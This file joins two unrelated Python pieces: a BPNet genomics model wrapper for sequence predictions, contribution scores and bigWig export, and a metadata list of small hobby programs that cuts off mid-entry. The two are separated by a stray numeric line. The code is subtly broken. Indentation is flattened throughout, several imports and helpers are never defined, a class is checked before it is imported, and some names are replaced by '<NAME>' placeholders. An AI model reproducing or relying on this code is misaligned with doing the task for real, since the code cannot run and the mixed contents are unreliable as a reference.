from concise.utils.plot import seqlogo
from bpnet.functions import mean
from concise.preprocessing import encodeDNA
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from genomelake.extractors import BigwigExtractor
import pyBigWig
import logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# TODO - remove the fasta file
# TODO is it possible to get rid of this class entirely?
class BPNetSeqModel:
"""BPNet based on SeqModel
"""
def __init__(self, seqmodel, fasta_file=None):
self.seqmodel = seqmodel
self.tasks = self.seqmodel.tasks
self.fasta_file = fasta_file
assert isinstance(self.seqmodel, SeqModel)
# TODO - add some sanity checks (profile head available etc)
@classmethod
def from_mdir(cls, model_dir):
from bpnet.seqmodel import SeqModel
# figure out also the fasta_file if present (from dataspec)
from bpnet.dataspecs import DataSpec
ds_path = os.path.join(model_dir, "dataspec.yml")
if os.path.exists(ds_path):
ds = DataSpec.load(ds_path)
fasta_file = ds.fasta_file
else:
fasta_file = None
return cls(SeqModel.from_mdir(model_dir), fasta_file=fasta_file)
def input_seqlen(self):
return self.seqmodel.seqlen
def predict(self, seq, batch_size=512):
"""Make model prediction
Args:
seq: numpy array of one-hot-encoded array of sequences
batch_size: batch size
Returns:
dictionary key=task and value=prediction for the task
"""
preds = self.seqmodel.predict(seq, batch_size=batch_size)
return {task: preds[f'{task}/profile'] * np.exp(preds[f'{task}/counts'][:, np.newaxis])
for task in self.seqmodel.tasks}
def contrib_score_all(self, seq, method='deeplift', aggregate_strand=True, batch_size=512,
pred_summaries=['profile/wn', 'counts/pre-act']):
"""Compute all contribution scores
Args:
seq: one-hot encoded DNA sequences
method: 'grad', 'deeplift' or 'ism'
          aggregate_strand: if True, the average contribution scores across strands will be returned
batch_size: batch size when computing the contribution scores
Returns:
dictionary with keys: {task}/{pred_summary}/{strand_i} or {task}/{pred_summary}
and values with the same shape as `seq` corresponding to contribution scores
"""
assert aggregate_strand
contrib_scores = self.seqmodel.contrib_score_all(seq, method=method)
return {f"{task}/" + self._get_old_contrib_score_name(pred_summary): contrib_scores[f"{task}/{pred_summary}"]
for task in self.seqmodel.tasks
for pred_summary in pred_summaries}
def _get_old_contrib_score_name(self, s):
# TODO - get rid of the old nomenclature
s2s = {"profile/wn": 'profile', 'counts/pre-act': 'count'}
return s2s[s]
def sim_pred(self, central_motif, side_motif=None, side_distances=[], repeat=128, contribution=[]):
"""Embed two motifs in random sequences and obtain their average predictions.
Args:
contribution: list of contribution scores
"""
from bpnet.simulate import generate_seq, average_profiles, flatten
batch_size = repeat
seqlen = self.seqmodel.seqlen
tasks = self.seqmodel.tasks
# simulate sequence
seqs = encodeDNA([generate_seq(central_motif, side_motif=side_motif,
side_distances=side_distances, seqlen=seqlen)
for i in range(repeat)])
# get predictions
scaled_preds = self.predict(seqs, batch_size=batch_size)
if contribution:
# get the contribution scores (compute only the profile and counts contribution)
contrib_scores_all = self.seqmodel.contrib_score_all(seqs, intp_pattern=['*/profile/wn', '*/counts/pre-act'])
contrib_scores = {t: {self._get_old_contrib_score_name(contrib_score_name): seqs * contrib_scores_all[f'{t}/{contrib_score_name}']
for contrib_score_name in contribution}
for t in tasks}
# merge and aggregate the profiles
out = {"contrib": contrib_scores, "profile": scaled_preds}
else:
out = {"profile": scaled_preds}
return average_profiles(flatten(out, "/"))
def get_seq(self, regions, variants=None, use_strand=False, fasta_file=None):
"""Get the one-hot-encoded sequence used to make model predictions and
optionally augment it with the variants
"""
if fasta_file is None:
fasta_file = self.fasta_file
if variants is not None:
if use_strand:
raise NotImplementedError("use_strand=True not implemented for variants")
# Augment the regions using a variant
if not isinstance(variants, list):
variants = [variants] * len(regions)
else:
assert len(variants) == len(regions)
seq = np.stack([extract_seq(interval, variant, fasta_file, one_hot=True)
for variant, interval in zip(variants, regions)])
else:
variants = [None] * len(regions)
seq = FastaExtractor(fasta_file, use_strand=use_strand)(regions)
return seq
def predict_all(self, seq, contrib_method='grad', batch_size=512, pred_summaries=['profile/wn', 'counts/pre-act']):
"""Make model prediction based
"""
preds = self.predict(seq, batch_size=batch_size)
if contrib_method is not None:
contrib_scores = self.contrib_score_all(seq, method=contrib_method, aggregate_strand=True,
batch_size=batch_size, pred_summaries=pred_summaries)
else:
contrib_scores = dict()
out = [dict(
seq=get_dataset_item(seq, i),
# interval=regions[i],
pred=get_dataset_item(preds, i),
# TODO - shall we call it hyp_contrib score or contrib_score?
contrib_score=get_dataset_item(contrib_scores, i),
) for i in range(len(seq))]
return out
def predict_regions(self, regions,
variants=None,
contrib_method='grad',
pred_summaries=['profile/wn', 'counts/pre-act'],
use_strand=False,
fasta_file=None,
batch_size=512):
"""
Args:
regions: list of pybedtools.Interval
          variants: a single instance or a list of bpnet.extractors.Variant
          contrib_method: contribution scoring method ('grad', 'deeplift' or 'ism'); if None, contribution scores are skipped
          pred_summaries: prediction summaries for which to compute contribution scores
"""
seq = self.get_seq(regions, variants, use_strand=use_strand, fasta_file=fasta_file)
preds = self.predict_all(seq, contrib_method, batch_size, pred_summaries=pred_summaries)
# append regions
for i in range(len(seq)):
preds[i]['interval'] = regions[i]
if variants is not None:
preds[i]['variant'] = variants[i]
return preds
def plot_regions(self, regions, ds=None, variants=None,
seqlets=[],
pred_summary='profile/wn',
contrib_method='grad',
batch_size=128,
# ylim=None,
xlim=None,
# seq_height=1,
rotate_y=0,
add_title=True,
fig_height_per_track=2,
same_ylim=False,
fig_width=20):
"""Plot predictions
Args:
regions: list of pybedtools.Interval
          variants: a single instance or a list of bpnet.extractors.Variant
ds: DataSpec. If provided, the ground truth will be added to the plot
pred_summary: 'mean' or 'max', summary function name for the profile gradients
"""
out = self.predict_regions(regions,
variants=variants,
contrib_method=contrib_method,
# pred_summary=pred_summary,
batch_size=batch_size)
figs = []
if xlim is None:
xmin = 0
else:
xmin = xlim[0]
shifted_seqlets = [s.shift(-xmin) for s in seqlets]
for i in range(len(out)):
pred = out[i]
interval = out[i]['interval']
if ds is not None:
obs = {task: ds.task_specs[task].load_counts([interval])[0] for task in self.tasks}
else:
obs = None
title = "{i.chrom}:{i.start}-{i.end}, {i.name} {v}".format(i=interval, v=pred.get('variant', ''))
# handle the DNase case
if isinstance(pred['seq'], dict):
seq = pred['seq']['seq']
else:
seq = pred['seq']
if obs is None:
# TODO - simplify?
viz_dict = OrderedDict(flatten_list([[
(f"{task} Pred", pred['pred'][task]),
(f"{task} Contrib profile", pred['contrib_score'][f"{task}/{pred_summary}"] * seq),
# (f"{task} Contrib counts", sum(pred['grads'][task_idx]['counts'].values()) / 2 * seq),
] for task_idx, task in enumerate(self.tasks)]))
else:
viz_dict = OrderedDict(flatten_list([[
(f"{task} Pred", pred['pred'][task]),
(f"{task} Obs", obs[task]),
(f"{task} Contrib profile", pred['contrib_score'][f"{task}/{pred_summary}"] * seq),
# (f"{task} Contrib counts", sum(pred['grads'][task_idx]['counts'].values()) / 2 * seq),
] for task_idx, task in enumerate(self.tasks)]))
if add_title:
title = "{i.chrom}:{i.start}-{i.end}, {i.name} {v}".format(i=interval, v=pred.get('variant', '')),
else:
title = None
if same_ylim:
fmax = {feature: max([np.abs(viz_dict[f"{task} {feature}"]).max() for task in self.tasks])
for feature in ['Pred', 'Contrib profile', 'Obs']}
ylim = []
for k in viz_dict:
f = k.split(" ", 1)[1]
if "Contrib" in f:
ylim.append((-fmax[f], fmax[f]))
else:
ylim.append((0, fmax[f]))
else:
ylim = None
fig = plot_tracks(filter_tracks(viz_dict, xlim),
seqlets=shifted_seqlets,
title=title,
fig_height_per_track=fig_height_per_track,
rotate_y=rotate_y,
fig_width=fig_width,
ylim=ylim,
legend=True)
figs.append(fig)
return figs
def export_bw(self,
regions,
output_prefix,
fasta_file=None,
contrib_method='grad',
pred_summaries=['profile/wn', 'counts/pre-act'],
batch_size=512,
scale_contribution= False,
flip_negative_strand = False,
chromosomes=None):
"""Export predictions and model contributions to big-wig files
Args:
regions: list of genomic regions
output_prefix: output file prefix
          batch_size: prediction batch size
          scale_contribution: if True, multiply the contribution scores by the predicted count value
          chromosomes: a list of chromosome names constituting the genome
"""
from pysam import FastaFile
# pred_summary: which operation to use for the profile gradients
logger.info("Get model predictions and contribution scores")
out = self.predict_regions(regions,
contrib_method=contrib_method,
pred_summaries=pred_summaries,
fasta_file=fasta_file,
batch_size=batch_size)
#Determine how many strands to write in export-bw
n_tracks = out[0]['pred'][self.tasks[0]].shape[1]
assert n_tracks <= 2, "More than 2 tracks predicted...please evaluate application of exporting bigwig tracks..."
if n_tracks == 1:
output_feats = ['preds', 'contrib.profile', 'contrib.counts']
elif n_tracks == 2:
output_feats = ['preds.pos', 'preds.neg', 'contrib.profile', 'contrib.counts']
logger.info("Setup bigWigs for writing")
# Get the genome lengths
if fasta_file is None:
fasta_file = self.fasta_file
fa = FastaFile(fasta_file)
if chromosomes is None:
genome = OrderedDict([(c, l) for c, l in zip(fa.references, fa.lengths)])
else:
genome = OrderedDict([(c, l) for c, l in zip(fa.references, fa.lengths) if c in chromosomes])
fa.close()
# make sure the regions are in the right order
first_chr = list(np.unique(np.array([interval.chrom for interval in regions])))
last_chr = [c for c, l in genome.items() if c not in first_chr]
genome = [(c, genome[c]) for c in first_chr + last_chr]
# open bigWigs for writing
bws = {}
for task in self.tasks:
bws[task] = {}
for feat in output_feats:
delim = "." if not output_prefix.endswith("/") else ""
bw_preds_pos = pyBigWig.open(f"{output_prefix}{delim}{task}.{feat}.bw", "w")
bw_preds_pos.addHeader(genome)
bws[task][feat] = bw_preds_pos
def add_entry(bw, arr, interval, start_idx=0):
"""Macro for adding an entry to the bigwig file
Args:
bw: pyBigWig file handle
arr: 1-dimensional numpy array
interval: genomic interval pybedtools.Interval
start_idx: how many starting values in the array to skip
"""
assert arr.ndim == 1
assert start_idx < len(arr)
if interval.stop - interval.start != len(arr):
logger.warning(f"interval.stop - interval.start ({interval.stop - interval.start})!= len(arr) ({len(arr)})")
logger.warning(f"Skipping the entry: {interval}")
return
bw.addEntries(interval.chrom, interval.start + start_idx,
values=arr[start_idx:],
span=1, step=1)
def to_1d_contrib(hyp_contrib, seq):
# mask the hyp_contrib + add them up
return (hyp_contrib * seq).sum(axis=-1)
# interval logic to handle overlapping intervals
# assumption: all intervals are sorted w.r.t the start coordinate
# strategy: don't write values at the same position twice (skip those)
#
# graphical representation:
# ... ] - prev_stop
# [ ] - new interval 1
# [ ] - added chunk from interval 1
# [ ] - new interval 2 - skip
# [ ] - new interval 3, fully add
logger.info("Writing to bigWigs")
prev_stop = None # Keep track of what the previous interval already covered
prev_chrom = None
for i in tqdm(range(len(out))):
interval = out[i]['interval']
if prev_chrom != interval.chrom:
# Encountered a new chromosome
prev_stop = 0 # Restart the end-counter
prev_chrom = interval.chrom
if prev_stop >= interval.stop:
# Nothing new to add to that range
continue
start_idx = max(prev_stop - interval.start, 0)
for tid, task in enumerate(self.tasks):
# Write predictions
preds = out[i]['pred'][task]
if n_tracks == 1:
add_entry(bws[task]['preds'], preds[:, 0],
interval, start_idx)
elif n_tracks == 2:
add_entry(bws[task]['preds.pos'], preds[:, 0],
interval, start_idx)
if flip_negative_strand:
add_entry(bws[task]['preds.neg'], preds[:, 1]*-1,
interval, start_idx)
else:
add_entry(bws[task]['preds.neg'], preds[:, 1],
interval, start_idx)
# Get the contribution scores
seq = out[i]['seq']
hyp_contrib = out[i]['contrib_score']
if scale_contribution:
si_profile = preds.sum() # Total number of counts in the region
si_counts = preds.sum()
else:
si_profile = 1
si_counts = 1
# Assertion to prevent multiple nucleotides being encoded at a genomic position.
if not np.all(seq.astype(bool).sum(axis=-1).max() == 1):
continue
if 'profile/wn' in pred_summaries:
add_entry(bws[task]['contrib.profile'],
to_1d_contrib(hyp_contrib[f'{task}/profile'], seq) * si_profile,
interval, start_idx)
if 'counts/pre-act' in pred_summaries:
add_entry(bws[task]['contrib.counts'],
to_1d_contrib(hyp_contrib[f'{task}/count'], seq) * si_counts,
interval, start_idx)
prev_stop = max(interval.stop, prev_stop)
logger.info("Done writing. Closing bigWigs")
# Close all the big-wig files
for task in self.tasks:
for feat in output_feats:
bws[task][feat].close()
logger.info(f"Done! Output files stored as: {output_prefix}{delim}*")
|
469816
|
PROGRAMS = [ { 'desc': 'A time-based quiz game to see how fast you can alphabetize letters.\nTags: short, game, word\n',
'filename': 'alphabetizequiz.py',
'hash': 1042153501,
'name': 'Alphabetize Quiz'},
{ 'desc': 'A deductive logic game where you must guess a number based on clues.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'A version of this game is featured in the book, "Invent Your Own\n'
'Computer Games with Python" https://nostarch.com/inventwithpython\n'
'Tags: short, game, puzzle\n',
'filename': 'bagels.py',
'hash': 411706525,
'name': 'Bagels'},
{ 'desc': 'Explore the surprising probabilities of the "Birthday Paradox".\n'
'More info at https://en.wikipedia.org/wiki/Birthday_problem\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, math, simulation\n',
'filename': 'birthdayparadox.py',
'hash': 3722774204,
'name': 'Birthday Paradox Simulation'},
{ 'desc': 'Displays a text message according to the provided bitmap image.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'bitmapmessage.py',
'hash': 283061086,
'name': 'Bitmap Message'},
{ 'desc': "The classic card game also known as 21. (This version doesn't have\n"
'splitting or insurance.)\n'
'More info at: https://en.wikipedia.org/wiki/Blackjack\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, card game\n',
'filename': 'blackjack.py',
'hash': 2948034624,
'name': 'Blackjack'},
{ 'desc': 'A bouncing dots animation. Press Ctrl-C to stop.\n'
'\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: short, artistic, bext, terminal\n',
'filename': 'bouncingdots.py',
'hash': 1551847665,
'name': 'Bouncing Dots'},
{ 'desc': 'A bouncing line animation. Press Ctrl-C to stop.\n'
'\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, bext, terminal\n',
'filename': 'bouncinglines.py',
'hash': 1609554076,
'name': 'Bouncing Lines'},
{ 'desc': 'The Caesar cipher is a shift cipher that uses addition and subtraction\n'
'to encrypt and decrypt letters.\n'
'More info at: https://en.wikipedia.org/wiki/Caesar_cipher\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: short, beginner, cryptography, math\n',
'filename': 'caesarcipher.py',
'hash': 1651758836,
'name': 'Caesar Cipher'},
{ 'desc': 'This programs hacks messages encrypted with the Caesar cipher by doing\n'
'a brute force attack against every possible key.\n'
'More info at:\n'
'https://en.wikipedia.org/wiki/Caesar_cipher#Breaking_the_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, cryptography, math\n',
'filename': 'caesarhacker.py',
'hash': 225964543,
'name': '<NAME> Hacker'},
{ 'desc': 'Create monthly calendars, saved to a text file and fit for printing.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short\n',
'filename': 'calendarmaker.py',
'hash': 1570317449,
'name': 'Calendar Maker'},
{ 'desc': 'A silly bluffing game between two human players. Based on the game\n'
'from the show, 8 Out of 10 Cats.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, beginner, game, two-player\n',
'filename': 'carrotinabox.py',
'hash': 456063392,
'name': '<NAME>'},
{ 'desc': 'The classic checkers board game. In this version, capturing is mandatory\n'
'and if you are blocked from moving, you lose.\n'
'Tags: extra-large, board game, game, two-player\n',
'filename': 'checkers.py',
'hash': 2959254415,
'name': 'Checkers'},
{ 'desc': 'The traditional Japanese dice game of even-odd.\n'
'View this code athttps://nostarch.com/big-book-small-python-projects\n'
'Tags: short, beginner, game\n',
'filename': 'chohan.py',
'hash': 2580289535,
'name': 'Cho-Han'},
{ 'desc': 'A clickbait headline generator for your soulless content farm website.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, beginner, humor, word\n',
'filename': 'clickbait.py',
'hash': 2336955734,
'name': 'Clickbait Headline Generator'},
{ 'desc': 'Simulate a large number of coin flips.\nTags: tiny, beginner, math, simulation\n',
'filename': 'coinflipsimulator.py',
'hash': 58697995,
'name': 'Coin Flip Simulator'},
{ 'desc': 'Generates numbers for the Collatz sequence, given a starting number.\n'
'More info at: https://en.wikipedia.org/wiki/Collatz_conjecture\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'collatz.py',
'hash': 3033240421,
'name': 'Collatz Sequence'},
{ 'desc': 'The classic cellular automata simulation. Press Ctrl-C to stop.\n'
'More info at: https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, simulation\n',
'filename': 'conwaysgameoflife.py',
'hash': 2738975912,
'name': "Conway's Game of Life"},
{ 'desc': 'Show a countdown timer animation using a seven-segment display.\n'
'Press Ctrl-C to stop.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'Requires sevseg.py to be in the same folder.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'countdown.py',
'hash': 1516595236,
'name': 'Countdown'},
{ 'desc': 'Use multiplication and subtraction to count the number of stars shown\n'
'as fast as possible.\n'
'Tags: short, math\n',
'filename': 'countingquiz.py',
'hash': 2159542432,
'name': 'Counting Quiz'},
{ 'desc': 'An animation of a deep cave that goes forever into the earth.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, scrolling, artistic\n',
'filename': 'deepcave.py',
'hash': 578224852,
'name': 'Deep Cave'},
{ 'desc': 'Draws diamonds of various sizes.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
' /\\ /\\\n'
' / \\ //\\\\\n'
' /\\ /\\ / \\ ///\\\\\\\n'
' / \\ //\\\\ / \\ ////\\\\\\\\\n'
' /\\ /\\ / \\ ///\\\\\\ \\ / \\\\\\\\////\n'
'/ \\ //\\\\ \\ / \\\\\\/// \\ / \\\\\\///\n'
'\\ / \\\\// \\ / \\\\// \\ / \\\\//\n'
' \\/ \\/ \\/ \\/ \\/ \\/\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'diamonds.py',
'hash': 287131560,
'name': '"Diamonds'},
{ 'desc': 'A flash card addition game where you sum the total on random dice rolls.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: large, artistic, game, math\n',
'filename': 'dicemath.py',
'hash': 584226948,
'name': 'Dice Math'},
{ 'desc': 'Simulates dice rolls using the Dungeons & Dragons dice roll notation.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, simulation\n',
'filename': 'diceroller.py',
'hash': 3363022820,
'name': 'Dice Roller'},
{ 'desc': 'Displays a digital clock of the current time with a seven-segment\n'
'display. Press Ctrl-C to stop.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'Requires sevseg.py to be in the same folder.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'digitalclock.py',
'hash': 2446156335,
'name': 'Digital Clock'},
{ 'desc': 'A screensaver in the style of The Matrix movie\'s "digital rain" visuals.\n'
'Tags: tiny, artistic, beginner, scrolling\n',
'filename': 'digitalrain.py',
'hash': 1802911501,
'name': 'Digital Rain'},
{ 'desc': 'A simple animation of a DNA double-helix. Press Ctrl-C to stop.\n'
'Inspired by matoken https://asciinema.org/a/155441\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, scrolling, science\n',
'filename': 'dna.py',
'hash': 1992587247,
'name': 'DNA'},
{ 'desc': 'A screensaver of many many ducklings.\n'
'\n'
'>" ) =^^) (``= ("= >") ("=\n'
'( >) ( ^) (v ) (^ ) ( >) (v )\n'
' ^ ^ ^ ^ ^ ^ ^^ ^^ ^^\n'
'\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, object-oriented, scrolling\n',
'filename': 'ducklings.py',
'hash': 251730393,
'name': 'Duckling Screensaver'},
{ 'desc': 'An art program that draws a continuous line around the screen using the\n'
'WASD keys. Inspired by Etch A Sketch toys.\n'
'\n'
'For example, you can draw Hilbert Curve fractal with:\n'
'SDWDDSASDSAAWASSDSASSDWDSDWWAWDDDSASSDWDSDWWAWDWWASAAWDWAWDDSDW\n'
'\n'
'Or an even larger Hilbert Curve fractal with:\n'
'DDSAASSDDWDDSDDWWAAWDDDDSDDWDDDDSAASDDSAAAAWAASSSDDWDDDDSAASDDSAAAAWA\n'
'ASAAAAWDDWWAASAAWAASSDDSAASSDDWDDDDSAASDDSAAAAWAASSDDSAASSDDWDDSDDWWA\n'
'AWDDDDDDSAASSDDWDDSDDWWAAWDDWWAASAAAAWDDWAAWDDDDSDDWDDSDDWDDDDSAASDDS\n'
'AAAAWAASSDDSAASSDDWDDSDDWWAAWDDDDDDSAASSDDWDDSDDWWAAWDDWWAASAAAAWDDWA\n'
'AWDDDDSDDWWAAWDDWWAASAAWAASSDDSAAAAWAASAAAAWDDWAAWDDDDSDDWWWAASAAAAWD\n'
'DWAAWDDDDSDDWDDDDSAASSDDWDDSDDWWAAWDD\n'
'\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic\n',
'filename': 'etchingdrawer.py',
'hash': 3197123097,
'name': 'Etching Drawer'},
{ 'desc': 'Finds all the factors of a number.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'factorfinder.py',
'hash': 3705722738,
'name': 'Factor Finder'},
{ 'desc': "Test your reflexes to see if you're the fastest draw in the west.\n"
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, game\n',
'filename': 'fastdraw.py',
'hash': 77919149,
'name': 'Fast Draw'},
{ 'desc': 'Calculates numbers of the Fibonacci sequence: 0, 1, 1, 2, 3, 5, 8, 13...\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, math\n',
'filename': 'fibonacci.py',
'hash': 3489339388,
'name': 'Fibonacci Sequence'},
{ 'desc': 'A beautiful animation of fireflies. Press Ctrl-C to stop.\n'
'This program MUST be run in a Terminal/Command Prompt window.\n'
'Tags: large, artistic, bext\n',
'filename': 'fireflies.py',
'hash': 674558448,
'name': 'Fireflies'},
{ 'desc': 'A peaceful animation of a fish tank. Press Ctrl-C to stop.\n'
'Similar to ASCIIQuarium or @EmojiAquarium, but mine is based on an\n'
'older ASCII fish tank program for DOS.\n'
'https://robobunny.com/projects/asciiquarium/html/\n'
'https://twitter.com/EmojiAquarium\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, artistic, bext\n',
'filename': 'fishtank.py',
'hash': 2715470870,
'name': 'Fish Tank'},
{ 'desc': 'Fizz Buzz is a game where you count up from 1, substituting "fizz" for\n'
'multiples of 3, "buzz" for multiples of 5, and "fizzbuzz" for multiples\n'
'of 3 and 5.\n'
'More info at: https://en.wikipedia.org/wiki/Fizz_buzz\n'
'Tags: tiny, beginner, math\n',
'filename': 'fizzbuzz.py',
'hash': 4051036935,
'name': 'Fizz Buzz Calculation'},
{ 'desc': 'A number game where you also race against the clock.\nTags: tiny, beginner, game, math\n',
'filename': 'fizzbuzzgame.py',
'hash': 3733034139,
'name': 'FizzBuzz Game'},
{ 'desc': 'A colorful game where you try to fill the board with a single color. Has\n'
'a mode for colorblind players.\n'
'Inspired by the "Flood It!" game.\n'
'Tags: large, game, bext, terminal\n',
'filename': 'floodplane.py',
'hash': 263543442,
'name': 'Floodplane'},
{ 'desc': 'A screensaver of several different floor painters painting over each\n'
"other's work.\n"
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, simulation, bext, terminal\n',
'filename': 'floorpainters.py',
'hash': 2588220699,
'name': 'Floor Painters animation'},
{ 'desc': 'A simulation of wildfires spreading in a forest. Press Ctrl-C to stop.\n'
"Inspired by <NAME>'s Emoji Sim http://ncase.me/simulating/model/\n"
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, bext, simulation\n',
'filename': 'forestfiresim.py',
'hash': 1053915388,
'name': 'Forest Fire Sim'},
{ 'desc': 'A tile-dropping game to get four in a row, similar to Connect Four.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, board game, two-player\n',
'filename': 'fourinarow.py',
'hash': 821596426,
'name': 'Four in a Row'},
{ 'desc': 'Gomoku is a Japanese board game where two players take turns placing\n'
'tiles. The first player to place five tiles in a row horizontally,\n'
'vertically, or diagonally wins.\n'
'More info at: https://en.wikipedia.org/wiki/Gomoku\n'
'Tags: large, game, board game, two-player\n',
'filename': 'gomoku.py',
'hash': 583266213,
'name': 'Gomoku'},
{ 'desc': 'Try to guess the secret number based on hints.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, game\n',
'filename': 'guess.py',
'hash': 3529806714,
'name': 'Guess the Number'},
{ 'desc': 'How to keep a gullible person busy for hours. (This is a joke program.)\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, humor\n',
'filename': 'gullible.py',
'hash': 1489899546,
'name': 'Gullible'},
{ 'desc': 'The hacking mini-game from "Fallout 3". Find out which seven-letter\n'
'word is the password by using clues each guess gives you.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, game, puzzle\n',
'filename': 'hacking.py',
'hash': 2764413842,
'name': 'Hacking Minigame'},
{ 'desc': 'Guess the letters to a secret word before the hangman is drawn.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, word, puzzle\n',
'filename': 'hangman.py',
'hash': 2061874015,
'name': 'Hangman'},
{ 'desc': 'Displays a simple tessellation of a hexagon grid.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'hexgrid.py',
'hash': 3118128620,
'name': 'Hex Grid'},
{ 'desc': 'An animation of an hourglass with falling sand. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext, simulation\n',
'filename': 'hourglass.py',
'hash': 1363063600,
'name': 'Hourglass'},
{ 'desc': 'Escape the hungry robots by making them crash into each other.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game\n',
'filename': 'hungryrobots.py',
'hash': 3223766853,
'name': 'Hungry Robots'},
{ 'desc': 'A mystery game of intrigue and a missing cat.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, game, humor, puzzle\n',
'filename': 'jaccuse.py',
'hash': 3367713448,
'name': "J'ACCUSE!"},
{ 'desc': 'A cellular automata animation. Press Ctrl-C to stop.\n'
'More info: https://en.wikipedia.org/wiki/Langton%27s_ant\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext, simulation\n',
'filename': 'langtonsant.py',
'hash': 270154230,
'name': "Langton's Ant"},
{ 'desc': 'Watch grass get cut and grow again. Press Ctrl-C to stop.\n'
'Inspired by Tondeuse by <NAME>, https://asciinema.org/a/21743\n'
'https://bitbucket.org/jvillard/tondeuse/src/default/\n'
'Tags: large, artistic, bext\n',
'filename': 'lawnmower.py',
'hash': 3253321659,
'name': 'Lawn Mower'},
{ 'desc': 'Translates English messages into l33t5p34]<.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, word\n',
'filename': 'leetspeak.py',
'hash': 1037849542,
'name': 'Leetspeak'},
{ 'desc': 'Try to find your lost kitten Zophie by moving around the neighborhood\n'
"streets and avenues. You'll get hints at how near or far she is.\n"
'This game teaches cartesian coordinates, cardinal directions, and\n'
'the Pythagorean Theorem.\n'
'Tags: large, game\n',
'filename': 'lostkitty.py',
'hash': 943287447,
'name': 'Lost Kitty'},
{ 'desc': 'A "press your luck" game where you roll dice to gather as many stars\n'
'as possible. You can roll as many times as you want, but if you roll\n'
'three skulls you lose all your stars.\n'
'\n'
'Inspired by the Zombie Dice game from <NAME>.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, multiplayer\n',
'filename': 'luckystars.py',
'hash': 780779378,
'name': 'Lucky Stars'},
{ 'desc': 'Ask a yes/no question about your future. Inspired by the Magic 8 Ball.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, humor\n',
'filename': 'magicfortuneball.py',
'hash': 2489922197,
'name': 'Magic Fortune Ball'},
{ 'desc': 'Place numbers in a hexagon so each row adds up to 38.\n'
'More info at https://en.wikipedia.org/wiki/Magic_hexagon\n'
'More info at https://www.youtube.com/watch?v=ZkVSRwFWjy0\n'
'Tags: large, board game, game, puzzle\n',
'filename': 'magichexagon.py',
'hash': 3356236025,
'name': '<NAME>'},
{ 'desc': 'The ancient seed-sowing game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, board game, game, two-player\n',
'filename': 'mancala.py',
'hash': 1205623725,
'name': 'Mancala'},
{ 'desc': 'Make mazes with the recursive backtracker algorithm.\n'
'\n'
'An animated demo: https://scratch.mit.edu/projects/17358777/\n'
'Tags: large, maze\n',
'filename': 'mazemakerrec.py',
'hash': 4148220427,
'name': 'Maze Maker'},
{ 'desc': 'Move around a maze and try to escape. Maze files are generated by\n'
'mazemakerrec.py.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, maze\n',
'filename': 'mazerunner2d.py',
'hash': 1230953144,
'name': 'Maze Runner 2D'},
{ 'desc': 'Move around a maze and try to escape... in 3D!\n'
